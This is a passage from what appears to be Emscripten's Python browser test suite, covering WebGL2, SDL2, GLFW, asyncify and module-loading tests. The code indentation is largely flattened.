self.btest(test_file('webgl2_garbage_free_entrypoints.cpp'), args=['-s', 'MAX_WEBGL_VERSION=2', '-DTEST_WEBGL2=1'], expected='1')
self.btest(test_file('webgl2_garbage_free_entrypoints.cpp'), expected='1')
@requires_graphics_hardware
def test_webgl2_backwards_compatibility_emulation(self):
self.btest(test_file('webgl2_backwards_compatibility_emulation.cpp'), args=['-s', 'MAX_WEBGL_VERSION=2', '-s', 'WEBGL2_BACKWARDS_COMPATIBILITY_EMULATION=1'], expected='0')
@requires_graphics_hardware
def test_webgl2_runtime_no_context(self):
    # tests that if we support WebGL 1 and 2, and WebGL2RenderingContext exists
    # but context creation fails, we can then manually try to create a WebGL 1
    # context and succeed.
self.btest(test_file('test_webgl2_runtime_no_context.cpp'), args=['-s', 'MAX_WEBGL_VERSION=2'], expected='1')
@requires_graphics_hardware
def test_webgl2_invalid_teximage2d_type(self):
self.btest(test_file('webgl2_invalid_teximage2d_type.cpp'), args=['-s', 'MAX_WEBGL_VERSION=2'], expected='0')
@requires_graphics_hardware
def test_webgl_with_closure(self):
self.btest(test_file('webgl_with_closure.cpp'), args=['-O2', '-s', 'MAX_WEBGL_VERSION=2', '--closure=1', '-lGL'], expected='0')
  # Tests that -s GL_ASSERTIONS=1 and glVertexAttribPointer with packed types work
@requires_graphics_hardware
def test_webgl2_packed_types(self):
self.btest(test_file('webgl2_draw_packed_triangle.c'), args=['-lGL', '-s', 'MAX_WEBGL_VERSION=2', '-s', 'GL_ASSERTIONS'], expected='0')
@requires_graphics_hardware
def test_webgl2_pbo(self):
self.btest(test_file('webgl2_pbo.cpp'), args=['-s', 'MAX_WEBGL_VERSION=2', '-lGL'], expected='0')
@no_firefox('fails on CI likely due to GPU drivers there')
@requires_graphics_hardware
def test_webgl2_sokol_mipmap(self):
self.btest(test_file('third_party', 'sokol', 'mipmap-emsc.c'), args=['-s', 'MAX_WEBGL_VERSION=2', '-lGL', '-O1'],
reference=os.path.join('third_party', 'sokol', 'mipmap-emsc.png'), reference_slack=2)
@no_firefox('fails on CI likely due to GPU drivers there')
@requires_graphics_hardware
def test_webgl2_sokol_mrt(self):
self.btest(test_file('third_party', 'sokol', 'mrt-emcc.c'), args=['-s', 'MAX_WEBGL_VERSION=2', '-lGL'],
reference=os.path.join('third_party', 'sokol', 'mrt-emcc.png'))
@requires_graphics_hardware
def test_webgl2_sokol_arraytex(self):
self.btest(test_file('third_party', 'sokol', 'arraytex-emsc.c'), args=['-s', 'MAX_WEBGL_VERSION=2', '-lGL'],
reference=os.path.join('third_party', 'sokol', 'arraytex-emsc.png'))
def test_sdl_touch(self):
for opts in [[], ['-O2', '-g1', '--closure=1']]:
print(opts)
self.btest(test_file('sdl_touch.c'), args=opts + ['-DAUTOMATE_SUCCESS=1', '-lSDL', '-lGL'], expected='0')
def test_html5_mouse(self):
for opts in [[], ['-O2', '-g1', '--closure=1']]:
print(opts)
self.btest(test_file('test_html5_mouse.c'), args=opts + ['-DAUTOMATE_SUCCESS=1'], expected='0')
def test_sdl_mousewheel(self):
for opts in [[], ['-O2', '-g1', '--closure=1']]:
print(opts)
self.btest(test_file('test_sdl_mousewheel.c'), args=opts + ['-DAUTOMATE_SUCCESS=1', '-lSDL', '-lGL'], expected='0')
def test_wget(self):
create_file('test.txt', 'emscripten')
self.btest(test_file('test_wget.c'), expected='1', args=['-s', 'ASYNCIFY'])
def test_wget_data(self):
create_file('test.txt', 'emscripten')
self.btest(test_file('test_wget_data.c'), expected='1', args=['-O2', '-g2', '-s', 'ASYNCIFY'])
def test_locate_file(self):
for wasm in [0, 1]:
print('wasm', wasm)
self.clear()
create_file('src.cpp', r'''
#include <stdio.h>
#include <string.h>
#include <assert.h>
int main() {
FILE *f = fopen("data.txt", "r");
assert(f && "could not open file");
char buf[100];
int num = fread(buf, 1, 20, f);
assert(num == 20 && "could not read 20 bytes");
buf[20] = 0;
fclose(f);
int result = !strcmp("load me right before", buf);
printf("|%s| : %d\n", buf, result);
REPORT_RESULT(result);
return 0;
}
''')
create_file('data.txt', 'load me right before...')
create_file('pre.js', 'Module.locateFile = function(x) { return "sub/" + x };')
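      # locateFile redirects the runtime's file requests (.wasm / .html.mem / test.data) into sub/, where the files are moved below.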
self.run_process([FILE_PACKAGER, 'test.data', '--preload', 'data.txt'], stdout=open('data.js', 'w'))
# put pre.js first, then the file packager data, so locateFile is there for the file loading code
self.compile_btest(['src.cpp', '-O2', '-g', '--pre-js', 'pre.js', '--pre-js', 'data.js', '-o', 'page.html', '-s', 'FORCE_FILESYSTEM', '-s', 'WASM=' + str(wasm)])
ensure_dir('sub')
if wasm:
shutil.move('page.wasm', os.path.join('sub', 'page.wasm'))
else:
shutil.move('page.html.mem', os.path.join('sub', 'page.html.mem'))
shutil.move('test.data', os.path.join('sub', 'test.data'))
self.run_browser('page.html', None, '/report_result?1')
# alternatively, put locateFile in the HTML
print('in html')
create_file('shell.html', '''
<body>
<script>
var Module = {
locateFile: function(x) { return "sub/" + x }
};
</script>
{{{ SCRIPT }}}
</body>
''')
def in_html(expected, args=[]):
self.compile_btest(['src.cpp', '-O2', '-g', '--shell-file', 'shell.html', '--pre-js', 'data.js', '-o', 'page.html', '-s', 'SAFE_HEAP', '-s', 'ASSERTIONS', '-s', 'FORCE_FILESYSTEM', '-s', 'WASM=' + str(wasm)] + args)
if wasm:
shutil.move('page.wasm', os.path.join('sub', 'page.wasm'))
else:
shutil.move('page.html.mem', os.path.join('sub', 'page.html.mem'))
self.run_browser('page.html', None, '/report_result?' + expected)
in_html('1')
# verify that the mem init request succeeded in the latter case
if not wasm:
create_file('src.cpp', r'''
#include <stdio.h>
#include <emscripten.h>
int main() {
int result = EM_ASM_INT({
return Module['memoryInitializerRequest'].status;
});
printf("memory init request: %d\n", result);
REPORT_RESULT(result);
return 0;
}
''')
in_html('200')
@requires_graphics_hardware
@parameterized({
'no_gl': (['-DCLIENT_API=GLFW_NO_API'],),
'gl_es': (['-DCLIENT_API=GLFW_OPENGL_ES_API'],)
})
def test_glfw3(self, args):
for opts in [[], ['-s', 'LEGACY_GL_EMULATION'], ['-Os', '--closure=1']]:
print(opts)
self.btest(test_file('glfw3.c'), args=['-s', 'USE_GLFW=3', '-lglfw', '-lGL'] + args + opts, expected='1')
@requires_graphics_hardware
def test_glfw_events(self):
self.btest(test_file('glfw_events.c'), args=['-s', 'USE_GLFW=2', "-DUSE_GLFW=2", '-lglfw', '-lGL'], expected='1')
self.btest(test_file('glfw_events.c'), args=['-s', 'USE_GLFW=3', "-DUSE_GLFW=3", '-lglfw', '-lGL'], expected='1')
@requires_graphics_hardware
def test_sdl2_image(self):
    # load an image file, get pixel data. Also covers -O2 with --preload-file and memory-init
shutil.copyfile(test_file('screenshot.jpg'), 'screenshot.jpg')
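    # Test both memory-init-file modes and both a flat preload path and an @-remapped destination (/assets).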
for mem in [0, 1]:
for dest, dirname, basename in [('screenshot.jpg', '/', 'screenshot.jpg'),
('screenshot.jpg@/assets/screenshot.jpg', '/assets', 'screenshot.jpg')]:
self.compile_btest([
test_file('sdl2_image.c'), '-o', 'page.html', '-O2', '--memory-init-file', str(mem),
'--preload-file', dest, '-DSCREENSHOT_DIRNAME="' + dirname + '"', '-DSCREENSHOT_BASENAME="' + basename + '"', '-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '--use-preload-plugins'
])
self.run_browser('page.html', '', '/report_result?600')
@requires_graphics_hardware
def test_sdl2_image_jpeg(self):
shutil.copyfile(test_file('screenshot.jpg'), 'screenshot.jpeg')
self.compile_btest([
test_file('sdl2_image.c'), '-o', 'page.html',
'--preload-file', 'screenshot.jpeg', '-DSCREENSHOT_DIRNAME="/"', '-DSCREENSHOT_BASENAME="screenshot.jpeg"', '-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '--use-preload-plugins'
])
self.run_browser('page.html', '', '/report_result?600')
@requires_graphics_hardware
def test_sdl2_image_formats(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
shutil.copyfile(test_file('screenshot.jpg'), 'screenshot.jpg')
self.btest('sdl2_image.c', expected='512', args=['--preload-file', 'screenshot.png', '-DSCREENSHOT_DIRNAME="/"', '-DSCREENSHOT_BASENAME="screenshot.png"',
'-DNO_PRELOADED', '-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '-s', 'SDL2_IMAGE_FORMATS=["png"]'])
self.btest('sdl2_image.c', expected='600', args=['--preload-file', 'screenshot.jpg', '-DSCREENSHOT_DIRNAME="/"', '-DSCREENSHOT_BASENAME="screenshot.jpg"',
'-DBITSPERPIXEL=24', '-DNO_PRELOADED', '-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '-s', 'SDL2_IMAGE_FORMATS=["jpg"]'])
def test_sdl2_key(self):
create_file('pre.js', '''
Module.postRun = function() {
function doOne() {
Module._one();
setTimeout(doOne, 1000/60);
}
setTimeout(doOne, 1000/60);
}
function keydown(c) {
var event = new KeyboardEvent("keydown", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
var prevented = !document.dispatchEvent(event);
        // send keypress if not prevented
if (!prevented) {
var event = new KeyboardEvent("keypress", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
}
}
function keyup(c) {
var event = new KeyboardEvent("keyup", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
}
''')
self.compile_btest([test_file('sdl2_key.c'), '-o', 'page.html', '-s', 'USE_SDL=2', '--pre-js', 'pre.js', '-s', 'EXPORTED_FUNCTIONS=_main,_one'])
self.run_browser('page.html', '', '/report_result?37182145')
def test_sdl2_text(self):
create_file('pre.js', '''
Module.postRun = function() {
function doOne() {
Module._one();
setTimeout(doOne, 1000/60);
}
setTimeout(doOne, 1000/60);
}
function simulateKeyEvent(c) {
var event = new KeyboardEvent("keypress", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.body.dispatchEvent(event);
}
''')
self.compile_btest([test_file('sdl2_text.c'), '-o', 'page.html', '--pre-js', 'pre.js', '-s', 'EXPORTED_FUNCTIONS=_main,_one', '-s', 'USE_SDL=2'])
self.run_browser('page.html', '', '/report_result?1')
@requires_graphics_hardware
def test_sdl2_mouse(self):
create_file('pre.js', '''
function simulateMouseEvent(x, y, button) {
var event = document.createEvent("MouseEvents");
if (button >= 0) {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousedown', true, true, window,
1, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event1);
var event2 = document.createEvent("MouseEvents");
event2.initMouseEvent('mouseup', true, true, window,
1, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event2);
} else {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousemove', true, true, window,
0, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
0, null);
Module['canvas'].dispatchEvent(event1);
}
}
window['simulateMouseEvent'] = simulateMouseEvent;
''')
self.compile_btest([test_file('sdl2_mouse.c'), '-O2', '--minify=0', '-o', 'page.html', '--pre-js', 'pre.js', '-s', 'USE_SDL=2'])
self.run_browser('page.html', '', '/report_result?1')
@requires_graphics_hardware
def test_sdl2_mouse_offsets(self):
create_file('pre.js', '''
function simulateMouseEvent(x, y, button) {
var event = document.createEvent("MouseEvents");
if (button >= 0) {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousedown', true, true, window,
1, x, y, x, y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event1);
var event2 = document.createEvent("MouseEvents");
event2.initMouseEvent('mouseup', true, true, window,
1, x, y, x, y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event2);
} else {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousemove', true, true, window,
0, x, y, x, y,
0, 0, 0, 0,
0, null);
Module['canvas'].dispatchEvent(event1);
}
}
window['simulateMouseEvent'] = simulateMouseEvent;
''')
create_file('page.html', '''
<html>
<head>
<style type="text/css">
html, body { margin: 0; padding: 0; }
#container {
position: absolute;
left: 5px; right: 0;
top: 5px; bottom: 0;
}
#canvas {
position: absolute;
left: 0; width: 600px;
top: 0; height: 450px;
}
textarea {
margin-top: 500px;
margin-left: 5px;
width: 600px;
}
</style>
</head>
<body>
<div id="container">
<canvas id="canvas"></canvas>
</div>
<textarea id="output" rows="8"></textarea>
<script type="text/javascript">
var Module = {
canvas: document.getElementById('canvas'),
print: (function() {
var element = document.getElementById('output');
element.value = ''; // clear browser cache
return function(text) {
if (arguments.length > 1) text = Array.prototype.slice.call(arguments).join(' ');
element.value += text + "\\n";
element.scrollTop = element.scrollHeight; // focus on bottom
};
})()
};
</script>
<script type="text/javascript" src="sdl2_mouse.js"></script>
</body>
</html>
''')
self.compile_btest([test_file('sdl2_mouse.c'), '-DTEST_SDL_MOUSE_OFFSETS=1', '-O2', '--minify=0', '-o', 'sdl2_mouse.js', '--pre-js', 'pre.js', '-s', 'USE_SDL=2'])
self.run_browser('page.html', '', '/report_result?1')
@requires_threads
def test_sdl2_threads(self):
self.btest('sdl2_threads.c', expected='4', args=['-s', 'USE_PTHREADS', '-s', 'USE_SDL=2', '-s', 'PROXY_TO_PTHREAD'])
@requires_graphics_hardware
def test_sdl2glshader(self):
self.btest('sdl2glshader.c', reference='sdlglshader.png', args=['-s', 'USE_SDL=2', '-O2', '--closure=1', '-g1', '-s', 'LEGACY_GL_EMULATION'])
self.btest('sdl2glshader.c', reference='sdlglshader.png', args=['-s', 'USE_SDL=2', '-O2', '-s', 'LEGACY_GL_EMULATION'], also_proxied=True) # XXX closure fails on proxy
@requires_graphics_hardware
def test_sdl2_canvas_blank(self):
self.btest('sdl2_canvas_blank.c', reference='sdl_canvas_blank.png', args=['-s', 'USE_SDL=2'])
@requires_graphics_hardware
def test_sdl2_canvas_palette(self):
self.btest('sdl2_canvas_palette.c', reference='sdl_canvas_palette.png', args=['-s', 'USE_SDL=2'])
@requires_graphics_hardware
def test_sdl2_canvas_twice(self):
self.btest('sdl2_canvas_twice.c', reference='sdl_canvas_twice.png', args=['-s', 'USE_SDL=2'])
@requires_graphics_hardware
def test_sdl2_gfx(self):
self.btest('sdl2_gfx.cpp', args=['-s', 'USE_SDL=2', '-s', 'USE_SDL_GFX=2'], reference='sdl2_gfx.png', reference_slack=2)
@requires_graphics_hardware
def test_sdl2_canvas_palette_2(self):
create_file('args-r.js', '''
Module['arguments'] = ['-r'];
''')
create_file('args-g.js', '''
Module['arguments'] = ['-g'];
''')
create_file('args-b.js', '''
Module['arguments'] = ['-b'];
''')
self.btest('sdl2_canvas_palette_2.c', reference='sdl_canvas_palette_r.png', args=['-s', 'USE_SDL=2', '--pre-js', 'args-r.js'])
self.btest('sdl2_canvas_palette_2.c', reference='sdl_canvas_palette_g.png', args=['-s', 'USE_SDL=2', '--pre-js', 'args-g.js'])
self.btest('sdl2_canvas_palette_2.c', reference='sdl_canvas_palette_b.png', args=['-s', 'USE_SDL=2', '--pre-js', 'args-b.js'])
def test_sdl2_swsurface(self):
self.btest('sdl2_swsurface.c', expected='1', args=['-s', 'USE_SDL=2', '-s', 'INITIAL_MEMORY=64MB'])
@requires_graphics_hardware
def test_sdl2_image_prepare(self):
# load an image file, get pixel data.
shutil.copyfile(test_file('screenshot.jpg'), 'screenshot.not')
self.btest('sdl2_image_prepare.c', reference='screenshot.jpg', args=['--preload-file', 'screenshot.not', '-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2'], manually_trigger_reftest=True)
@requires_graphics_hardware
def test_sdl2_image_prepare_data(self):
# load an image file, get pixel data.
shutil.copyfile(test_file('screenshot.jpg'), 'screenshot.not')
self.btest('sdl2_image_prepare_data.c', reference='screenshot.jpg', args=['--preload-file', 'screenshot.not', '-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2'], manually_trigger_reftest=True)
@requires_graphics_hardware
def test_sdl2_canvas_proxy(self):
def post():
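      # Inject the reftest harness into the generated test.html and delay window.close so the proxied frames
      # reach the canvas before doReftest() runs.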
html = open('test.html').read()
html = html.replace('</body>', '''
<script>
function assert(x, y) { if (!x) throw 'assertion failed ' + y }
%s
var windowClose = window.close;
window.close = function() {
// wait for rafs to arrive and the screen to update before reftesting
setTimeout(function() {
doReftest();
setTimeout(windowClose, 5000);
}, 1000);
};
</script>
</body>''' % open('reftest.js').read())
create_file('test.html', html)
create_file('data.txt', 'datum')
self.btest('sdl2_canvas_proxy.c', reference='sdl2_canvas.png', args=['-s', 'USE_SDL=2', '--proxy-to-worker', '--preload-file', 'data.txt', '-s', 'GL_TESTING'], manual_reference=True, post_build=post)
def test_sdl2_pumpevents(self):
# key events should be detected using SDL_PumpEvents
create_file('pre.js', '''
function keydown(c) {
var event = new KeyboardEvent("keydown", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
}
''')
self.btest('sdl2_pumpevents.c', expected='7', args=['--pre-js', 'pre.js', '-s', 'USE_SDL=2'])
def test_sdl2_timer(self):
self.btest('sdl2_timer.c', expected='5', args=['-s', 'USE_SDL=2'])
def test_sdl2_canvas_size(self):
self.btest('sdl2_canvas_size.c', expected='1', args=['-s', 'USE_SDL=2'])
@requires_graphics_hardware
def test_sdl2_gl_read(self):
# SDL, OpenGL, readPixels
self.compile_btest([test_file('sdl2_gl_read.c'), '-o', 'something.html', '-s', 'USE_SDL=2'])
self.run_browser('something.html', '.', '/report_result?1')
@requires_graphics_hardware
def test_sdl2_glmatrixmode_texture(self):
self.btest('sdl2_glmatrixmode_texture.c', reference='sdl2_glmatrixmode_texture.png',
args=['-s', 'LEGACY_GL_EMULATION', '-s', 'USE_SDL=2'],
message='You should see a (top) red-white and (bottom) white-red image.')
@requires_graphics_hardware
def test_sdl2_gldrawelements(self):
self.btest('sdl2_gldrawelements.c', reference='sdl2_gldrawelements.png',
args=['-s', 'LEGACY_GL_EMULATION', '-s', 'USE_SDL=2'],
message='GL drawing modes. Bottom: points, lines, line loop, line strip. Top: triangles, triangle strip, triangle fan, quad.')
@requires_graphics_hardware
def test_sdl2_glclipplane_gllighting(self):
self.btest('sdl2_glclipplane_gllighting.c', reference='sdl2_glclipplane_gllighting.png',
args=['-s', 'LEGACY_GL_EMULATION', '-s', 'USE_SDL=2'],
message='glClipPlane and GL_LIGHTING emulation. You should see a torus cut open on one side with lighting from one lightsource applied.')
@requires_graphics_hardware
def test_sdl2_fog_simple(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('sdl2_fog_simple.c', reference='screenshot-fog-simple.png',
args=['-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '-O2', '--minify=0', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '--use-preload-plugins'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl2_fog_negative(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('sdl2_fog_negative.c', reference='screenshot-fog-negative.png',
args=['-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '--use-preload-plugins'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl2_fog_density(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('sdl2_fog_density.c', reference='screenshot-fog-density.png',
args=['-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '--use-preload-plugins'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl2_fog_exp2(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('sdl2_fog_exp2.c', reference='screenshot-fog-exp2.png',
args=['-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '--use-preload-plugins'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl2_fog_linear(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('sdl2_fog_linear.c', reference='screenshot-fog-linear.png', reference_slack=1,
args=['-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '--use-preload-plugins'],
message='You should see an image with fog.')
def test_sdl2_unwasteful(self):
self.btest('sdl2_unwasteful.cpp', expected='1', args=['-s', 'USE_SDL=2', '-O1'])
def test_sdl2_canvas_write(self):
self.btest('sdl2_canvas_write.cpp', expected='0', args=['-s', 'USE_SDL=2'])
@requires_graphics_hardware
def test_sdl2_gl_frames_swap(self):
def post_build(*args):
self.post_manual_reftest(*args)
html = open('test.html').read()
html2 = html.replace('''Module['postRun'] = doReftest;''', '') # we don't want the very first frame
assert html != html2
create_file('test.html', html2)
self.btest('sdl2_gl_frames_swap.c', reference='sdl2_gl_frames_swap.png', args=['--proxy-to-worker', '-s', 'GL_TESTING', '-s', 'USE_SDL=2'], manual_reference=True, post_build=post_build)
@requires_graphics_hardware
def test_sdl2_ttf(self):
shutil.copy2(test_file('freetype', 'LiberationSansBold.ttf'), self.get_dir())
self.btest('sdl2_ttf.c', reference='sdl2_ttf.png',
args=['-O2', '-s', 'USE_SDL=2', '-s', 'USE_SDL_TTF=2', '--embed-file', 'LiberationSansBold.ttf'],
message='You should see colorful "hello" and "world" in the window')
@requires_graphics_hardware
def test_sdl2_ttf_rtl(self):
shutil.copy2(test_file('third_party', 'notofont', 'NotoNaskhArabic-Regular.ttf'), self.get_dir())
self.btest('sdl2_ttf_rtl.c', reference='sdl2_ttf_rtl.png',
args=['-O2', '-s', 'USE_SDL=2', '-s', 'USE_SDL_TTF=2', '--embed-file', 'NotoNaskhArabic-Regular.ttf'],
message='You should see colorful "سلام" and "جهان" with shaped Arabic script in the window')
def test_sdl2_custom_cursor(self):
shutil.copyfile(test_file('cursor.bmp'), 'cursor.bmp')
self.btest('sdl2_custom_cursor.c', expected='1', args=['--preload-file', 'cursor.bmp', '-s', 'USE_SDL=2'])
def test_sdl2_misc(self):
self.btest_exit('sdl2_misc.c', args=['-s', 'USE_SDL=2'])
@disabled('https://github.com/emscripten-core/emscripten/issues/13101')
def test_sdl2_misc_main_module(self):
self.btest_exit('sdl2_misc.c', args=['-s', 'USE_SDL=2', '-s', 'MAIN_MODULE'])
def test_sdl2_misc_via_object(self):
self.run_process([EMCC, '-c', test_file('sdl2_misc.c'), '-s', 'USE_SDL=2', '-o', 'test.o'])
self.compile_btest(['test.o', '-s', 'EXIT_RUNTIME', '-s', 'USE_SDL=2', '-o', 'test.html'])
self.run_browser('test.html', '...', '/report_result?exit:0')
@parameterized({
'dash_s': (['-s', 'USE_SDL=2', '-s', 'USE_SDL_MIXER=2'],),
'dash_l': (['-lSDL2', '-lSDL2_mixer'],),
})
@requires_sound_hardware
def test_sdl2_mixer_wav(self, flags):
shutil.copyfile(test_file('sounds', 'the_entertainer.wav'), 'sound.wav')
self.btest('sdl2_mixer_wav.c', expected='1', args=['--preload-file', 'sound.wav', '-s', 'INITIAL_MEMORY=33554432'] + flags)
@parameterized({
'wav': ([], '0', 'the_entertainer.wav'),
'ogg': (['ogg'], 'MIX_INIT_OGG', 'alarmvictory_1.ogg'),
'mp3': (['mp3'], 'MIX_INIT_MP3', 'pudinha.mp3'),
'mod': (['mod'], 'MIX_INIT_MOD', 'bleep.xm'),
})
@requires_sound_hardware
def test_sdl2_mixer_music(self, formats, flags, music_name):
shutil.copyfile(test_file('sounds', music_name), music_name)
self.btest('sdl2_mixer_music.c', expected='1', args=[
'--preload-file', music_name,
'-DSOUND_PATH=' + json.dumps(music_name),
'-DFLAGS=' + flags,
'-s', 'USE_SDL=2',
'-s', 'USE_SDL_MIXER=2',
'-s', 'SDL2_MIXER_FORMATS=' + json.dumps(formats),
'-s', 'INITIAL_MEMORY=33554432'
])
@no_wasm_backend('cocos2d needs to be ported')
@requires_graphics_hardware
def test_cocos2d_hello(self):
cocos2d_root = os.path.join(system_libs.Ports.get_build_dir(), 'cocos2d')
preload_file = os.path.join(cocos2d_root, 'samples', 'HelloCpp', 'Resources') + '@'
self.btest('cocos2d_hello.cpp', reference='cocos2d_hello.png', reference_slack=1,
args=['-s', 'USE_COCOS2D=3', '-s', 'ERROR_ON_UNDEFINED_SYMBOLS=0',
'--preload-file', preload_file, '--use-preload-plugins',
'-Wno-inconsistent-missing-override'],
message='You should see Cocos2d logo')
def test_async(self):
for opts in [0, 1, 2, 3]:
print(opts)
self.btest('browser/async.cpp', '1', args=['-O' + str(opts), '-g2', '-s', 'ASYNCIFY'])
def test_asyncify_tricky_function_sig(self):
self.btest('browser/test_asyncify_tricky_function_sig.cpp', '85', args=['-s', 'ASYNCIFY_ONLY=[foo(char.const*?.int#),foo2(),main,__original_main]', '-s', 'ASYNCIFY=1'])
@requires_threads
def test_async_in_pthread(self):
self.btest('browser/async.cpp', '1', args=['-s', 'ASYNCIFY', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-g'])
def test_async_2(self):
# Error.stackTraceLimit defaults to 10 in Chrome, but this test relies on more
# than 40 stack frames being reported.
create_file('pre.js', 'Error.stackTraceLimit = 80;\n')
self.btest('browser/async_2.cpp', '40', args=['-O3', '--pre-js', 'pre.js', '-s', 'ASYNCIFY'])
def test_async_virtual(self):
for opts in [0, 3]:
print(opts)
self.btest('browser/async_virtual.cpp', '5', args=['-O' + str(opts), '-profiling', '-s', 'ASYNCIFY'])
def test_async_virtual_2(self):
for opts in [0, 3]:
print(opts)
self.btest('browser/async_virtual_2.cpp', '1', args=['-O' + str(opts), '-s', 'ASSERTIONS', '-s', 'SAFE_HEAP', '-profiling', '-s', 'ASYNCIFY'])
# Test async sleeps in the presence of invoke_* calls, which can happen with
# longjmp or exceptions.
@parameterized({
'O0': ([],), # noqa
'O3': (['-O3'],), # noqa
})
def test_async_longjmp(self, args):
self.btest('browser/async_longjmp.cpp', '2', args=args + ['-s', 'ASYNCIFY'])
def test_async_mainloop(self):
for opts in [0, 3]:
print(opts)
self.btest('browser/async_mainloop.cpp', '121', args=['-O' + str(opts), '-s', 'ASYNCIFY'])
@requires_sound_hardware
def test_sdl_audio_beep_sleep(self):
self.btest('sdl_audio_beep_sleep.cpp', '1', args=['-Os', '-s', 'ASSERTIONS', '-s', 'DISABLE_EXCEPTION_CATCHING=0', '-profiling', '-s', 'SAFE_HEAP', '-lSDL', '-s', 'ASYNCIFY'], timeout=90)
def test_mainloop_reschedule(self):
self.btest('mainloop_reschedule.cpp', '1', args=['-Os', '-s', 'ASYNCIFY'])
def test_mainloop_infloop(self):
self.btest('mainloop_infloop.cpp', '1', args=['-s', 'ASYNCIFY'])
def test_async_iostream(self):
self.btest('browser/async_iostream.cpp', '1', args=['-s', 'ASYNCIFY'])
# Test an async return value. The value goes through a custom JS library
# method that uses asyncify, and therefore it needs to be declared in
# ASYNCIFY_IMPORTS.
# To make the test more precise we also use ASYNCIFY_IGNORE_INDIRECT here.
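# The 'response' variant passes the import list via an @-response file (filey.txt, written in
# the test body), while the -DBAD variants deliberately omit the declaration, presumably so the
# C side can expect the broken behavior.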
@parameterized({
'normal': (['-s', 'ASYNCIFY_IMPORTS=[sync_tunnel]'],), # noqa
'response': (['-s', 'ASYNCIFY_IMPORTS=@filey.txt'],), # noqa
'nothing': (['-DBAD'],), # noqa
'empty_list': (['-DBAD', '-s', 'ASYNCIFY_IMPORTS=[]'],), # noqa
'em_js_bad': (['-DBAD', '-DUSE_EM_JS'],), # noqa
})
def test_async_returnvalue(self, args):
if '@' in str(args):
create_file('filey.txt', '["sync_tunnel"]')
self.btest('browser/async_returnvalue.cpp', '0', args=['-s', 'ASYNCIFY', '-s', 'ASYNCIFY_IGNORE_INDIRECT', '--js-library', test_file('browser', 'async_returnvalue.js')] + args + ['-s', 'ASSERTIONS'])
def test_async_stack_overflow(self):
self.btest('browser/async_stack_overflow.cpp', 'abort:RuntimeError: unreachable', args=['-s', 'ASYNCIFY', '-s', 'ASYNCIFY_STACK_SIZE=4'])
def test_async_bad_list(self):
self.btest('browser/async_bad_list.cpp', '0', args=['-s', 'ASYNCIFY', '-s', 'ASYNCIFY_ONLY=[waka]', '--profiling'])
# Tests that when building with -s MINIMAL_RUNTIME=1, the build can use -s MODULARIZE=1 as well.
def test_minimal_runtime_modularize(self):
self.compile_btest([test_file('browser_test_hello_world.c'), '-o', 'test.html', '-s', 'MODULARIZE', '-s', 'MINIMAL_RUNTIME'])
self.run_browser('test.html', None, '/report_result?0')
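# With MODULARIZE the generated a.out.js exposes a factory function (named 'Module' by default,
# or whatever EXPORT_NAME specifies) that returns a Promise of the initialized module instance;
# each `code` snippet below is dropped into a hand-written a.html to exercise that contract.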
@requires_sync_compilation
def test_modularize(self):
for opts in [
[],
['-O1'],
['-O2', '-profiling'],
['-O2'],
['-O2', '--closure=1']
]:
for args, code in [
# defaults
([], '''
let promise = Module();
if (!(promise instanceof Promise)) throw new Error('Return value should be a promise');
'''),
# use EXPORT_NAME
(['-s', 'EXPORT_NAME="HelloWorld"'], '''
if (typeof Module !== "undefined") throw "what?!"; // do not pollute the global scope, we are modularized!
